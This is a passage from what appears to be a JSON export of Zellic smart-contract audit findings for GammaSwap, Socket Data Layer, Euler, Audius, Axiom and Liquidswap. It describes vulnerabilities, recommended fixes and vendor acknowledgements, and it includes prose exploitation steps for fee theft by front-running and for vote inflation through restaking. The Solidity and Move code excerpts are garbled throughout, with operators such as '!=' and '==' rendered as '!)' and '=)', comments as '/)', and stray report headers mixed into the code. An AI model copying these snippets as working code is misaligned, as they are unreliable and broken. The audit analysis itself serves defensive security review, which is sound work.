IVester(poolTrackers[_gsPool].vester).withdrawForAccount(msg.sender); } lacks a check that the _gsPool is a valid address in the poolTrackers mapping. Failure to properly check the validity of parameters could lead to unexpected behav- ior, which in this case would have resulted in a failed external call. It is a good security practice to ensure the validity of parameters before using them, especially when these refer to arbitrary addresses. In the function above, the _gsPool parameter could be checked that it exists within the poolTrackers mapping. This would prevent the function from being called with an invalid _gsPool address. function withdrawEsGsForPool(address _gsPool) external nonReentrant { require(poolTrackers[_gsPool].vester !) address(0), \u201dStakingRouter: Pool not found\u201d); IVester(poolTrackers[_gsPool].vester).withdrawForAccount(msg.sender); } This issue has been acknowledged by GammaSwap. Zellic GammaSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Switchboard can steal extra execution fees", + "labels": [ + "Zellic" + ], + "body": "Target: ExecutionManager Category: Business Logic Likelihood: Low Severity: High : Medium The payAndCheckFees function considers any fees left over after transmission fees, switchboard fees, and the minimum execution fees \u2014 the verification overhead fees added to msg.value transfer fees) \u2014 to be extra execution fees which can be optionally provided to encourage priority execution: if (msg.value >) type(uint128).max) revert InvalidMsgValue(); uint128 msgValue = uint128(msg.value); /) transmission fees are per packet, so need to divide by number of messages per packet transmissionFees = transmissionMinFees[transmitManager_][siblingChainSlug_] / uint128(maxPacketLength_); uint128 minMsgExecutionFees = _getMinFees( minMsgGasLimit_, payloadSize_, executionParams_, siblingChainSlug_ ); uint128 minExecutionFees = minMsgExecutionFees + verificationOverheadFees_; if (msgValue < transmissionFees + switchboardFees_ + minExecutionFees) revert InsufficientFees(); /) any extra fee is considered as executionFee executionFee = msgValue - transmissionFees - switchboardFees_; Zellic Socket Technology The switchboardFees_ and verificationOverheadFees_ both come from the switch- board when ISwitchboard.getMinFees is called to fetch the fees in SocketSrc (these values are passed into payAndCheckFees as arguments): /** * @notice Retrieves the minimum fees required for switchboard. * @param siblingChainSlug_ The slug of the destination chain for the message. * @param switchboard__ The switchboard address for which fees is retrieved. * @return switchboardFees fees required for message verification *) function _getSwitchboardMinFees( uint32 siblingChainSlug_, ISwitchboard switchboard__ ) { } internal view returns (uint128 switchboardFees, uint128 verificationOverheadFees) (switchboardFees, verificationOverheadFees) = switchboard__.getMinFees( siblingChainSlug_ ); A switchboard can return values from ISwitchboard.getMinFees such that the payAnd CheckFees call does not revert with InsufficientFees but has no extra execution fee, thereby stealing from the executor and/or the user. The values can be configured in the on-chain switchboard by front-running the SocketSrc.outbound call. The following steps represent the simplest exploitation of this issue, where each top- level, numbered item represents a separate transaction: 1. The frontrunning transaction: Switchboard fees are increased. 2. The victim transaction: Fees were calculated off-chain in advance (including an extra fee). On-chain, the outbound call is made, and the switchboard steals the extra fee. Zellic Socket Technology Per the Socket Data Layer documentation, the getMinFees call should be done in the same transaction as the outbound call, preventing exploitation using those steps. However, if this issue were to be exploited, it would require the switchboard to perform malicious behavior: increasing fees unexpectedly during the outbound call. Thus, in the event that the issue is exploited, it is reasonable to expect that the switch- board may perform other unexpected behavior aside from simply increasing fees such as configuring the switchboard to return one set of values for the first _getMinFees call and another for the second: 1. The frontrunning transaction: The switchboard contract is upgraded to change the behavior of _getMinFees such that its return value is variable and determined based on call order. 2. The victim transaction: a. The first call to getMinFees calls _getMinFees on the switchboard. The ex- pected switchboard and overhead fees are returned such that the plug passes in the value it expected (i.e. the original minimum fees with an extra fee added on for priority execution purposes). b. The second call to the switchboard\u2019s _getMinFees returns a value for the switchboard fee that includes the extra fees passed into the outbound call such that no extra fees remain, and all fees go to the switchboard. So, we believe calculating the minimum fees in the same transaction as making the outbound call does not effectively mitigate the risk. The protocol cannot enforce an implementation of a switchboard, so the threat model should include the switchboard behaving in any manner it chooses. While the user ultimately needs to assess the risk, it is important to acknowledge that the risk does exist. We understand the extra fees are to encourage prioritized execution and that refund- ing them to the user to discourage sending extra fees would defeat this goal. Either of the following solutions ensure the switchboard cannot increase fees (but can decrease \u2014 which would increase message priority incentive) while still allowing the user to pass extra execution fees: To ensure fees cannot be stolen, we recommend adding a SocketSrc.outbound caller-specified argument for the maximum value for transmissionFees + swit chboardFees_ + minExecutionFees (i.e. the minimum fees required to send the message \u2014 without any extra fees). Zellic Socket Technology Alternatively, simply require the SocketSrc.outbound caller to specify an argu- ment for the amount of extra fees \u2014 if any \u2014 and add this value to the Insuffic ientFees check. The protocol is not directly at risk from this issue; the purpose of mitigating this issue would be to reduce risk and prevent potential harm to a user who does not sufficiently vet the plug\u2019s configured switchboard \u2014 or, since a plug implementation may allow a frontrunning attack to change the switchboard before the transaction, a user who does not sufficiently vet the plug. Socket Technology acknowledged the finding, noting that the system relies on repu- tation and that if a switchboard were to act maliciously, users would lose trust in the switchboard and/or the plug configured to use it: The Plugs are expected to only select Switchboards they trust after thoroughly vetting its fee mechanism. We agree that malicious behavior would cause users to lose trust in the switchboard and/or the plug. However, we believe risk is still presented to the system if the issue is exploitable even once, which is a possibility presently determined by the plug im- plementation and configured switchboard. Mitigating the issue prevents the plug and switchboard from creating the opportunity to exploit the user in the first place. Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Unconstrained minMsgGasLimit unaccounted for in fees", + "labels": [ + "Zellic" + ], + "body": "Target: ExecutionManager Category: Coding Mistakes Likelihood: High Severity: Medium : Medium The minMsgGasLimit_ passed into the SocketSrc.outbound function specifies the mini- mum gas that the SocketDst.inbound executor must pass. The setting is passed into outbound, then follows this chain: 1. _validateAndSendFees(minMsgGasLimit_, ...))) 2. _executionManager.payAndCheckFees(minMsgGasLimit_, ...))) 3. _getMinFees(minMsgGasLimit_, ...))) Finally, _getMinFees drops this value; the first parameter is not named: function payAndCheckFees( uint256 minMsgGasLimit_, uint256 payloadSize_, bytes32 executionParams_, bytes32, /) Zellic: this is `_getMinFees` uint32 siblingChainSlug_, uint128 switchboardFees_, uint128 verificationOverheadFees_, address transmitManager_, address switchboard_, uint256 maxPacketLength_ ) { } external payable override returns (uint128 executionFee, uint128 transmissionFees) /) [...))] Zellic Socket Technology Nowhere along this chain are limits enforced on minMsgGasLimit, and the value is not used when calculating fees. The executor may take a loss if gas fees are high because of minMsgGasLimit. Addi- tionally, messages are not guaranteed to be deliverable on the data layer of Socket if the gas limit were too high. Note that this does not affect plugs; only executors are potentially negatively im- pacted. Account for the minMsgGasLimit in fees. Socket Technology acknowledged this finding, noting that the code is simply incom- plete in the assessment version and that fee accounting will be implemented in the future: For now minMsgGasLimit is part of packetMessage and it is used on destination side to check if provided executionGasLimit is enough. We plan to introduce detailed _getMinFees that would use both minMsgGasLimit and payloadSize. When we do it, the executionFees[siblingChainSlug_] that is present currently would break into parts, which would be multiplied with minMsgGasLimit and pay loadSize. Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Arbitraging against Socket Data Layer", + "labels": [ + "Zellic" + ], + "body": "Target: ExecutionManager Category: Business Logic Likelihood: High Severity: Low : Low A feature of Socket Data Layer is the ability to send msg.value with messages cross- chain. This essentially acts as a swap from the source chain\u2019s native coin to that of the destination chain. The price of the source chain\u2019s native coin in terms of the destination chain\u2019s native coin is determined by a ratio set by the FEES_UPDATER_ROLE role. When paying fees for the message, the _getMinFees debits native tokens based on that ratio and the requested msgValue: /) decodes and validates the msg value if it is under given transfer limits and calculates /) the total fees needed for execution for given payload size and msg value. function _getMinFees( uint256, uint256 payloadSize_, bytes32 executionParams_, uint32 siblingChainSlug_ ) internal view returns (uint128) { /) [...))] uint256 params = uint256(executionParams_); uint8 paramType = uint8(params >) 248); if (paramType =) 0) return executionFees[siblingChainSlug_]; uint256 msgValue = uint256(uint248(params)); if (msgValue < msgValueMinThreshold[siblingChainSlug_]) revert MsgValueTooLow(); if (msgValue > msgValueMaxThreshold[siblingChainSlug_]) revert MsgValueTooHigh(); uint256 msgValueRequiredOnSrcChain = (relativeNativeTokenPrice[ siblingChainSlug_ Zellic Socket Technology ] * msgValue) / 1e18; /) [...))] } /) [...))] function setRelativeNativeTokenPrice( uint256 nonce_, uint32 siblingChainSlug_, uint256 relativeNativeTokenPrice_, bytes calldata signature_ ) external override { /) [...))] _checkRoleWithSlug(FEES_UPDATER_ROLE, siblingChainSlug_, feesUpdater); /) [...))] relativeNativeTokenPrice[siblingChainSlug_] = relativeNativeTokenPrice_; /) [...))] } There may be a delay between the fee updater\u2019s submission of the relative native token prices and the actual relative price. Arbitrage happens between at least two exchanges.[1] Socket Data Layer acts as one exchange, and any exchange (e.g., Uniswap, Curve, or even another Socket Data Layer path) may be used as the second. The core of the issue is that there is an arbitrage opportunity anytime the relative native token price difference between Socket Data Layer and another exchange is exploitable for profit (i.e., after fees), which is especially likely to happen in a volatile market. There are a number of protections implemented that may make an arbitrage oppor- tunity with Socket Data Layer less trivial to exploit: Socket Technology noted that the fee updater will quickly submit signatures to try to keep the price as up-to-date as possible. There is the existence of the maximum msgValue threshold: 1 In arbitrage, there may be one or more intermediate exchange(s) used in a chain to maximize prof- itability. But the minimum number of exchanges required is two. Zellic Socket Technology if (msgValue > msgValueMaxThreshold[siblingChainSlug_]) revert MsgValueTooHigh(); Cross-chain message transfers do not occur immediately. Any delay leaves room for more price disparities between the involved exchanges, potentially ending the opportunity and causing a loss to the arbitrageur. However, none of these eliminates the possibility of an arbitrage opportunity; while these measures may mitigate the ease of exploitation, if the price ratio is not updated atomically (i.e., within the same transaction) before sending a packet, the potential for a price difference exists. Additionally, the maximum msgValue threshold can be bypassed by sending many messages in the same packet, splitting transmission fees. The cross-chain message transfer may not be instant, but the Socket Data Layer ex- change occurs immediately on the sending chain. Only, the output native coin is es- sentially redeemed once the message arrives on the destination chain. So, if the other exchange is on the source chain, the arbitrage attack can be atomically executed. For many exchanges, arbitrage is generally beneficial because of its role in promoting market efficiency and price convergence; that is, arbitrageurs facilitate the alignment of asset values across decentralized exchanges, reducing spreads. However, Socket Data Layer does not operate an order book and swaps do not impact pricing, so arbitrage against it does not resolve price inefficiencies and potentially has negative impact on the executors who provide the msg.value liquidity on the destina- tion chain. When successfully executed, the arbitrageur \u201cwins\u201d the price difference between the trade. This value must come from somewhere \u2014\u2013 and the \u201closers\u201d are the liquidity providers who lost their liquidity to a bad trade. In Socket Data Layer\u2019s case, the executors ultimately provide the native coin to the destination chain, so they are the entity negatively impacted by the fee updater\u2019s slow response. Assuming no limit to the number of messages that can be sent during a price inef- ficiency, the profits are only limited by how many native coins the executor is able to provide on the destination chain. Once the executors run out of destination chain native coins, the arbitrage opportunity closes. Zellic Socket Technology Ensure executors evaluate whether the fees paid for the msgValue transfer are satis- factory before executing the message on chain. Set up monitoring to ensure other on-chain oracles\u2019 prices do not vary too much fron the fee updater oracle\u2019s prices. Socket Technology acknowledged this finding, noting: msgValue checks are already in [the execution client] to check it before execution and we are working on the monitoring system. Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Random address recovered from ECDSA\u2019s signature recov- ery may be used for executor fee accounting", + "labels": [ + "Zellic" + ], + "body": "Target: OpenExecutionManager Category: Coding Mistakes Likelihood: Low Severity: Low : Low In OpenExecutionManager, the NatSpec for isExecutor states the following: /** * @notice This function allows all executors * @notice The executor recovered here can be a random address hence should not be used for fee accounting * @param packedMessage Packed message to be executed * @param sig Signature of the message * @return executor Address of the executor * @return isValidExecutor Boolean value indicating whether the executor is valid or not *) function isExecutor( bytes32 packedMessage, bytes memory sig ) external view override returns (address executor, bool isValidExecutor) { executor = signatureVerifier__.recoverSigner(packedMessage, sig); isValidExecutor = true; } Specifically, the notice The executor recovered here can be a random address henc e should not be used for fee accounting is important. The address returned by this function is used within _execute() when updating the executor\u2019s fee accounting: executionManager__.updateExecutionFees( executor_, /) Zellic: this address is from isExecutor() Zellic Socket Technology uint128(messageDetails_.executionFee), messageDetails_.msgId ); If the address recovered is random, the accounting would be incorrect. Document prominently above the isExecutor() function, or alternatively above the call to updateExecutionFees() in _execute(), that executors must provide a valid sig- nature that recovers to their address, as otherwise the executor fee accounting will be done incorrectly. This issue has been acknowledged by Socket Technology, and a fix was implemented in commit 00688523. They have also stated that executor\u2019s nodes will go through rigorous testing that should catch any issues like this. Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.5 ExecutionManager should assert function requirements", + "labels": [ + "Zellic" + ], + "body": "Target: ExecutionManager Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The payAndCheckFees function uses the maxPacketLength_ argument to reduce the transmission fees to split the fee between messages in the packet: function payAndCheckFees( uint256 minMsgGasLimit_, uint256 payloadSize_, bytes32 executionParams_, bytes32, uint32 siblingChainSlug_, uint128 switchboardFees_, uint128 verificationOverheadFees_, address transmitManager_, address switchboard_, uint256 maxPacketLength_ ) { external payable override returns (uint128 executionFee, uint128 transmissionFees) if (msg.value >) type(uint128).max) revert InvalidMsgValue(); uint128 msgValue = uint128(msg.value); /) transmission fees are per packet, so need to divide by number of messages per packet transmissionFees = transmissionMinFees[transmitManager_][siblingChainSlug_] / uint128(maxPacketLength_); This value is ultimately passed from the SocketSrc.outbound function, where it is fetched from the capacitor: Zellic Socket Technology function outbound( uint32 siblingChainSlug_, uint256 minMsgGasLimit_, bytes32 executionParams_, bytes32 transmissionParams_, bytes calldata payload_ ) external payable override returns (bytes32 msgId) { /) [...))] /) fetches auxillary details for the message from the plug config plugConfig.capacitor__ = _plugConfigs[msg.sender][siblingChainSlug_] .capacitor__; /) [...))] ISocket.Fees memory fees = _validateAndSendFees( minMsgGasLimit_, uint256(payload_.length), executionParams_, transmissionParams_, plugConfig.outboundSwitchboard__, plugConfig.capacitor__.getMaxPacketLength(), /) Zellic: this is `maxPacketLength_` siblingChainSlug_ ); During our assessment, there were only two capacitor/decapacitor pairs available to deploy through CapacitorFactory: SingleCapacitor \u2014 hardcoded maximum packet length of 1. HashChainCapacitor \u2014 variable maximum packet length between 0[2] and Hash ChainCapacitor.MAX_LEN: constructor( address socket_, address owner_, uint256 maxPacketLength_ 2 Though HashChainCapacitor is out of scope, we wanted to document the possibility of a division by zero in the transmission fee splitting because the maximum packet length can be zero. Zellic Socket Technology ) BaseCapacitor(socket_, owner_) { if (maxPacketLength > MAX_LEN) revert InvalidPacketLength(); maxPacketLength = maxPacketLength_; } There are currently limits on the maxPacketLength. However, there is risk of a future capacitor/decapacitor pair being written that does not enforce a maximum packet length because the variable is checked at the capacitor level. If a maxPacketLength were greater than the transmission fees, no transmission fees would be paid. Additionally, a tiny amount of transmission fees are regularly lost in precision from the division. As the transmission fees decrease or maxPacketLength increases, the division loses precision, and fees are lost because the division rounds down. We recommend the following: Enforce a maximum value for maxPacketLength as a payAndCheckFees function requirement or in CapacitorFactory when deploying the capacitor/decapacitor contract pair. Enforce a minimum value transmission fee, though keep it relatively insignificant. This ensures parties are properly compensated even in cases of high maxPacket Length values. Round the division up to prevent transmission fee losses due to precision. Socket Technology acknowledged this finding, adding that they will add the maxP acketLength check in CapacitorFactory. This change was implemented in commit 83d6d0af. Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Risk of proof type confusion", + "labels": [ + "Zellic" + ], + "body": "Target: SocketDst Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The Socket Data Layer protocol supports capacitors and decapacitors. Capacitors are used on the sending chain to pack packets into messages. These messages can then be sealed by transmitters and subsequently transmitted to a remote chain. A decapacitor on the remote chain would then be able to unpack this message so that it may be executed. There are currently two types of capacitors: SingleCapacitor HashChainCapacitor A plug can choose to change the capacitors it uses by simply changing the switch- boards that it is using (which is what the capacitors and decapacitors are connected to). This can be done without any restrictions at any point in time. Currently, the two capacitor and decapacitor implementations are mutually exclusive. That is to say that a packed message packed by the SingleCapacitor would fail to be unpacked by the HashChainDecapacitor. This is what the ideal scenario is. However, it is possible that with future implementations of new capacitor types, a message packed by one capacitor may actually be able to be unpacked by a com- pletely different decapacitor. In this case, the unpacked message would very likely not match the original message that was sent, and therefore an arbitrary message may get executed. There is no immediate risk presented by the capacitors and decapacitors in scope, but we recommend that Socket Data Layer be very careful when introducing new types of capacitors. Ensure that all implemented capacitors are mutually exclusive (as they are now), or consider adding restrictions on when a plug can change its switchboard implementations. Additionally, consider adding type information to packets that specifies which capaci- Zellic Socket Technology tor generated the proof and thus which decapacitor should be used to verify message inclusion using the proof. This would eliminate this class of threat entirely because type confusion would no longer be possible. Socket Technology acknowledged this finding, noting that users should only use vet- ted and reputable plugs, and such plugs should pause functionality and take care of all in-flight messages prior to changing switchboards. They also noted that changing switchboards should be a fairly rare occurrence: Switchboard change is expected to be rare. Plugs would have to pause new messages and finish all in flight ones before they change it for graceful migration. Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Gas optimization for switchboard registration", + "labels": [ + "Zellic" + ], + "body": "Target: SwitchboardBase Category: Gas Optimization Likelihood: N/A Severity: Informational : Informational Within the registerSiblingSlug() function of NativeSwitchboardBase, there is an al- ready initialized check: function registerSiblingSlug(/) ...)) *)) external override onlyRole(GOVERNANCE_ROLE) { if (isInitialized) revert AlreadyInitialized(); initialPacketCount = initialPacketCount_; (address capacitor, ) = socket__.registerSwitchboardForSibling(/) ...)) *)); isInitialized = true; capacitor__ = ICapacitor(capacitor); remoteNativeSwitchboard = remoteNativeSwitchboard_; } This check is here because the registerSwitchboardForSibling() function that is called on the socket__ can only be called once. This initialization check prevents gas from being wasted on an unnecessary call if the switchboard has already been regis- tered. The above check is nonexistent in the corresponding SwitchboardBase contract, which can lead to a waste of a small amount of gas if the switchboard owner calls registerSiblingSlug() after the switchboard has already been initialized. Consider adding an initialization check in the registerSiblingSlug() function within the SwitchboardBase contract. Zellic Socket Technology This issue has been acknowledged by Socket Technology. Zellic Socket Technology", + "html_url": "https://github.com/Zellic/publications/blob/master/Socket Data Layer - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Single-step ownership transfer may cause loss of contract ownership", + "labels": [ + "Zellic" + ], + "body": "Target: EulerClaims.sol Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The transferOwnership() function is used to transfer ownership of the contract to a different address. This is done in a single step, meaning that the ownership is fully transferred after this function is called. function transferOwnership(address newOwner) external onlyOwner { require(newOwner !) address(0), \"owner is zero\"); owner = newOwner; emit OwnerChanged(newOwner); } The function checks that the new owner is not set to address(0) to prevent an erro- neous transfer of ownership. However, there is still a risk that the owner may input an incorrect address for the new owner, either due to a typo or other mistakes. If this happens, it can result in a loss of ownership of the contract, potentially leading to unclaimed funds being permanently locked into the contract. Consider using a two-step ownership transfer mechanism. See OpenZeppelin\u2019s im- plementation of Ownable2Step here. This issue has been acknowledged by Euler Labs Ltd.. Zellic Euler Labs Ltd. 4 Threat Model This provides a full threat model description for various functions. As time permitted, we analyzed each function in the smart contracts and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. The absence of a threat model in this section does not necessarily suggest that a function is safe.", + "html_url": "https://github.com/Zellic/publications/blob/master/Euler - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Module: EulerClaims.sol Function: claimAndAgreeToTerms(byte[32] acceptanceToken, uint256 index, TokenAmount tokenAmounts, byte[32] proof) Used by users to claim their redemption tokens. Inputs", + "labels": [ + "Zellic" + ], + "body": "acceptanceToken \u2013 Control: Fully controlled. \u2013 Constraints: Must be a hash of the user\u2019s address concatenated with a pre- set terms and conditions hash. \u2013 : Reverts if this is not correct. index \u2013 Control: Fully controlled. \u2013 Constraints: Used to verify the Merkle proof, so it cannot be forged. \u2013 : Reverts if forged. tokenAmounts \u2013 Control: Fully controlled. \u2013 Constraints: Used to verify the Merkle proof, so it cannot be forged. \u2013 : Reverts if forged. proof \u2013 Control: Fully controlled. \u2013 Constraints: The proof that the other inputs are verified against. Cannot be forged as it is used to get back to the Merkle root. \u2013 : Reverts if forged. Zellic Euler Labs Ltd. Branches and code coverage (including function calls) Intended branches Simple Merkle tree works correctly. 4\u25a1 Test coverage Large Merkle tree works correctly. 4\u25a1 Test coverage Negative behavior Reverts if terms and conditions were not accepted. 4\u25a1 Negative test Reverts if an invalid proof is passed in. 4\u25a1 Negative test Reverts if an invalid index is passed in. 4\u25a1 Negative test Reverts if the user claiming the tokens is not eligible to them. 4\u25a1 Negative test Reverts if tokenAmounts is forged or tampered with. 4\u25a1 Negative test Zellic Euler Labs Ltd. 5 Audit Results At the time of our audit, the code was not deployed to mainnet Ethereum. During our audit, we discovered two findings. Both were suggestions (informational). Euler Labs Ltd. acknowledged all findings and implemented fixes.", + "html_url": "https://github.com/Zellic/publications/blob/master/Euler - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Voting can potentially be influenced via restaking", + "labels": [ + "Zellic" + ], + "body": "Target: GovernanceV2 Category: Business Logic Likelihood: Low Severity: High : High Currently, the magnitude of a vote is determined when it is submitted, based on the total stake of the user that submits the vote. function submitVote(uint256 _proposalId, Vote _vote) external { /) ...)) address voter = msg.sender; /) ...)) /) Require voter has non-zero total active stake uint256 voterActiveStake = _calculateAddressActiveStake(voter); require( voterActiveStake > 0, \u201cGovernance: Voter must be address with non-zero total active stake.\u201d ); /) Record vote proposals[_proposalId].votes[voter] = _vote; /) Record voteMagnitude for voter proposals[_proposalId].voteMagnitudes[voter] = voterActiveStake; /) ...)) } function _calculateAddressActiveStake(address _address) private view returns (uint256) { Zellic Tiki Labs Inc. ServiceProviderFactory spFactory = ServiceProviderFactory(serviceProviderFactoryAddress); DelegateManager delegateManager = DelegateManager(delegateManagerAddress); /) Amount directly staked by address, if any, in ServiceProviderFactory (uint256 directDeployerStake,,,,,) = spFactory.getServiceProviderDetails(_address); /) Amount of pending decreasedStakeRequest for address, if any, in ServiceProviderFactory (uint256 lockedDeployerStake,) = spFactory.getPendingDecreaseStakeRequest(_address); /) active deployer stake = (direct deployer stake - locked deployer stake) uint256 activeDeployerStake = directDeployerStake.sub(lockedDeployerStake); /) Total amount delegated by address, if any, in DelegateManager uint256 totalDelegatorStake = delegateManager.getTotalDelegatorStake(_address); /) Amount of pending undelegateRequest for address, if any, in DelegateManager (,uint256 lockedDelegatorStake, ) = delegateManager.getPendingUndelegateRequest(_address); /) active delegator stake = (total delegator stake - locked delegator stake) uint256 activeDelegatorStake = totalDelegatorStake.sub(lockedDelegatorStake); /) activeStake = (activeDeployerStake + activeDelegatorStake) uint256 activeStake = activeDeployerStake.add(activeDelegatorStake); return activeStake; } As currently designed, there exists no checks on whether the staking/unstaking lock- ing period is greater than the voting period. Imagine the following scenario: Zellic Tiki Labs Inc. 1. User A votes \u201cYES\u201d on a proposal, then unstakes their share and transfers it to user B. 2. User B stakes, then votes \u201cYES\u201d on the same proposal, effectively pumping the voting weight. 3. The process could repeat over and over, as long as the staking/unstaking locking periods fit in the voting period of the proposal. As discussed with the Audius team, we determined that currently the contracts are se- cure, since the staking lockup period is greater than the voting period. This means that despite the fact that theoretically the attack may be possible under specific circum- stances (e.g., locking period of staking is way less than the voting period of proposal), it is impossible to perform it as per the current state of the contracts. The fix, as proposed by the Audius team, would be to enforce that the unstake period is always greater than the voting period of a proposal. The issue has been addressed in pull request 4358. Zellic Tiki Labs Inc.", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius EVM - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Initialize check is missing from some functions", + "labels": [ + "Zellic" + ], + "body": "Target: DelegateManager(V2), WormholeClient Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The _requireIsInitialized function is available in contracts that inherit the Initializ ableV2 contract and is used to ensure that the child contract has been initialized before performing any other function call. Currently, the cancelRemoveDelegatorRequest in De legateManagerV2 and DelegateManager and transferTokens in WormholeClient miss this important check. There are no direct security implications of these instances of omitting the _requireIs Initialized check; however, the functions that should implement it and currently do not would revert. In order to keep a consistent code design and follow best practices over all the con- tracts and their functions, we recommend adding the _requireIsInitialized function call in the two functions mentioned above. /) DelegateManagerV2.sol, DelegateManager.sol function cancelRemoveDelegatorRequest(address _serviceProvider, address _delegator) external { _requireIsInitialized(); require( msg.sender =) _serviceProvider |) msg.sender =) governanceAddress, ERROR_ONLY_SP_GOVERNANCE ); require( removeDelegatorRequests[_serviceProvider][_delegator] !) 0, \u201cDelegateManager: No pending request\u201d ); /) Reset lockup expiry removeDelegatorRequests[_serviceProvider][_delegator] = 0; Zellic Tiki Labs Inc. emit RemoveDelegatorRequestCancelled(_serviceProvider, _delegator); } /) WormholeClient.sol function transferTokens( address from, uint256 amount, uint16 recipientChain, bytes32 recipient, uint256 arbiterFee, uint deadline, uint8 v, bytes32 r, bytes32 s ) public { _requireIsInitialized(); /) ...)) The issues have been addressed in pull request 4360. Zellic Tiki Labs Inc.", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius EVM - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Stake contract address should not change once set", + "labels": [ + "Zellic" + ], + "body": "Target: Project-wide Category: Business Logic Likelihood: N/A Severity: Medium : Medium Currently, the address of the staking contract is stored in a variable called stakingAd dress and can be set via the setStakingAddress function, an action that can only be performed by the governanceAddress. There is no check put in place, however, on whether the stakingAddress has been previously set or not. Changing the staking address after users have already interacted with it may result in a significant confusion between the user and the contracts they are supposed to interact with. This is mainly because the accounts mapping, which stores the amounts staked by each user, would not reflect what the user has staked in the initial Staking contract. We strongly recommend that once set, the stakingAddress should not be changeable. function setStakingAddress(address _stakingAddress) external { _requireIsInitialized(); require(stakingAddress =) address(0), ERROR_STAKING_ALREADY_SET); require(msg.sender =) governanceAddress, ERROR_ONLY_GOVERNANCE); stakingAddress = _stakingAddress; emit StakingAddressUpdated(_stakingAddress); } The issues have been addressed in pull request 4362. Zellic Tiki Labs Inc.", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius EVM - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Unused allowance", + "labels": [ + "Zellic" + ], + "body": "Target: ClaimsManager Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The initiateRound functions approves a transfer; however, this allowance is not used by the safeTransfer. function initiateRound() external { ...)) audiusToken.mint(address(this), recurringCommunityFundingAmount); /) Approve transfer to community pool address audiusToken.approve(communityPoolAddress, recurringCommunityFundingAmount); /) Transfer to community pool address ERC20(address(audiusToken)).safeTransfer(communityPoolAddress, recurringCommunityFundingAmount); ...)) This allows communityPoolAddress to receive twice the allotted claims from the claim sManager. Currently this does not pose an active security issue as EthRewardsManager is only managed by governance; however, if the communityPoolAddress changed, this could result in a more severe vulnerability. Remove the approval, or use safeTransferFrom instead of safeTransfer. The issue has been addressed in pull request 4359. Zellic Tiki Labs Inc.", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius EVM - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Inconsistent usage of SafeMath", + "labels": [ + "Zellic" + ], + "body": "Target: Project-wide Category: Coding Mistakes Likelihood: Low Severity: Low : Low Solidity version 0.5 does not have inbuilt overflow or underflow protections. As a consequence of this, SafeMath should be used in areas where overflow or underflow are not the intended behavior, such that the operations revert safely. As an example, underflow protection should be implemented in the function below: function _removeFromInProgressProposals(uint256 _proposalId) internal { ...)) inProgressProposals[index] = inProgressProposals[inProgressProposals.length - 1]; inProgressProposals.pop(); } In the areas affected, we only noted reverts; however, future commits could change the behaviour of certain affected functions, leading to more severe vulnerabilities. Use SafeMath wherever overflow is not intended behavior. The issue has been fixed in pull request 4361. Zellic Tiki Labs Inc.", + "html_url": "https://github.com/Zellic/publications/blob/master/Audius EVM - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The decompose_rlp_array_phase1 is missing in receipt-query circuits", + "labels": [ + "Zellic" + ], + "body": "Target: receipt/circuit.rs Category: Coding Mistakes Likelihood: High Severity: High : High The receipt circuit deals with the receipts and the parsing of receipts into various fields and logs as well as the parsing of logs into topics and data. One of the main functions inside the receipt-query circuit is the parse_log function, which parses a log by de- composing the RLP encoded byte array into a list of addresses, topics, and data. The topics byte array is then once again RLP decoded into a list of topics. These two RLP decompositions are done via the RlpChip\u2019s decompose_rlp_array_phase0. However, unlike every other usage of decompose_rlp_array_phase0, there is no corre- sponding decompose_rlp_array_phase1 being done on the RlpArrayWitness at the relevant phase. This leads to a soundness issue. The RLP decomposition of the logs into addresses, topics, and data and the RLP de- composition of topics into a variable length list of topics is underconstrained. We recommend adding the decompose_rlp_array_phase1 calls appropriately to avoid soundness vulnerabilities. This issue has been acknowledged by Axiom, and fixes were implemented in the fol- lowing commits: 4f73b7bb 5985b263 Zellic Axiom", + "html_url": "https://github.com/Zellic/publications/blob/master/Axiom November - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Implicit precision loss in stable_curve:)lp_value", + "labels": [ + "Zellic" + ], + "body": "Target: liquidswap::stable_curve Category: Business Logic Likelihood: Low Severity: Low : Low In stable_curve:)lp_value, coins with more than eight decimals experience implicit precision loss. The current implementation returns the LP value scaled by (10 ^ 8) ^ 4 in order to maintain precision across division: public fun lp_value(x_coin: u128, x_scale: u64, y_coin: u128, y_scale: u64): U256 { let x_u256 = u256:)from_u128(x_coin); let y_u256 = u256:)from_u128(y_coin); let u2561e8 = u256:)from_u128(ONE_E_8); let x_scale_u256 = u256:)from_u64(x_scale); let y_scale_u256 = u256:)from_u64(y_scale); let _x = u256:)div( u256:)mul(x_u256, u2561e8), x_scale_u256, ); let _y = u256:)div( u256:)mul(y_u256, u2561e8), y_scale_u256, 